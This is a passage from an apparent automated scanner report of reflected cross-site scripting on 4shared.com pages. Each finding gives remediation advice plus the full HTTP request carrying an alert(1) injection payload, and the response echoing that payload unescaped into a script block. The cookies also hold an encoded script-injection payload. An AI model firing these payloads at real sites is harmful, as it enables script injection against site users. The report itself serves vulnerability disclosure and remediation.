Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /mf6ba5"-alert(1)-"f2530800432/symbian.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /mf6ba5&quot;-alert(1)-&quot;f2530800432/symbian.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=99D8FFB4975C056D9F3C05BF4AC05215.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:39 GMT
Connection: close
Content-Length: 36117


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/mf6ba5"-alert(1)-"f2530800432/symbian.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.351. http://www.4shared.com/m/symbian.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/symbian.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50ceb"-alert(1)-"9c67985142f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /m/symbian.jsp50ceb"-alert(1)-"9c67985142f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /m/symbian.jsp50ceb&quot;-alert(1)-&quot;9c67985142f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A6C24D0B2E2E5D66858D67429BC70026.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/m/symbian.jsp50ceb"-alert(1)-"9c67985142f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.352. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39736"-alert(1)-"1ec01b6de0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main39736&quot;-alert(1)-&quot;1ec01b6de0e/translate/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F73CC572AF956E9F72337A2529924ADE.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main39736"-alert(1)-"1ec01b6de0e/translate/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.353. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11c9c"-alert(1)-"b3e63033d79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate11c9c&quot;-alert(1)-&quot;b3e63033d79/setLang.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6E0A71945AFFA927BE3920160757DB9.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:11 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate11c9c"-alert(1)-"b3e63033d79/setLang.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.354. http://www.4shared.com/main/translate/setLang.jsp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /main/translate/setLang.jsp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77fc0"-alert(1)-"030cd898f55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /main/translate/setLang.jsp77fc0&quot;-alert(1)-&quot;030cd898f55
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87EA3869ED34688155236636B5D3476F.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:21 GMT
Connection: close
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/main/translate/setLang.jsp77fc0"-alert(1)-"030cd898f55";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.355. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17562"-alert(1)-"aa3f9a7695c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth17562&quot;-alert(1)-&quot;aa3f9a7695c/startFacebookLogin.jsp
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8154EA1F3F4FF79D5646E442478F4DB6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:44 GMT
Connection: close
Content-Length: 36203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth17562"-alert(1)-"aa3f9a7695c/startFacebookLogin.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feed
...[SNIP]...

1.356. http://www.4shared.com/oauth/startFacebookLogin.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /oauth/startFacebookLogin.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4481d"-alert(1)-"c7de45f4dcb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must be embedded, it should be written with an encoder made for JavaScript string literals (one that escapes quotes, backslashes, line terminators and the < and > characters as \xHH or \uHHHH sequences); the HTML-entity encoding that this response applies to its status line does not protect a script block, and here the script block receives the raw request path.

Request

GET /oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /oauth/startFacebookLogin.jsp4481d&quot;-alert(1)-&quot;c7de45f4dcb
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=621C418861194619D182939BF9069DC2.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:50 GMT
Connection: close
Content-Length: 36203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/oauth/startFacebookLogin.jsp4481d"-alert(1)-"c7de45f4dcb";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.357. http://www.4shared.com/premium.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb2ec"-alert(1)-"e169cb5f37d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /premium.jspcb2ec"-alert(1)-"e169cb5f37d HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /premium.jspcb2ec&quot;-alert(1)-&quot;e169cb5f37d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1A92818CFB6F551716E7018166B205B6.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:00 GMT
Connection: close
Content-Length: 36118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/premium.jspcb2ec"-alert(1)-"e169cb5f37d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.358. http://www.4shared.com/press_room/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /press_room/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94440"-alert(1)-"30c8fdbfe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /press_room94440"-alert(1)-"30c8fdbfe4/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /press_room94440&quot;-alert(1)-&quot;30c8fdbfe4/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D48B010F53E401E07A710D3F1BC1A7B.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:13 GMT
Connection: close
Content-Length: 36102


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/press_room94440"-alert(1)-"30c8fdbfe4/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.359. http://www.4shared.com/privacy.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /privacy.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35670"-alert(1)-"3015378b77f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.jsp35670"-alert(1)-"3015378b77f HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /privacy.jsp35670&quot;-alert(1)-&quot;3015378b77f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9CA83E4A7CCCE2745DB3EEC1AE1A1846.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:42 GMT
Connection: close
Content-Length: 36107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/privacy.jsp35670"-alert(1)-"3015378b77f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.360. http://www.4shared.com/q/BAQD/1/books_office [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/books_office

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f84fe"-alert(1)-"086eb606b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /f84fe&quot;-alert(1)-&quot;086eb606b7a/BAQD/1/books_office
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28AE5917D14DA5B988790134206A2EC8.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:49 GMT
Connection: close
Content-Length: 36152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/f84fe"-alert(1)-"086eb606b7a/BAQD/1/books_office";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

1.361. http://www.4shared.com/q/BAQD/1/music [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /q/BAQD/1/music

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8ddd"-alert(1)-"4eb60d1a81f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

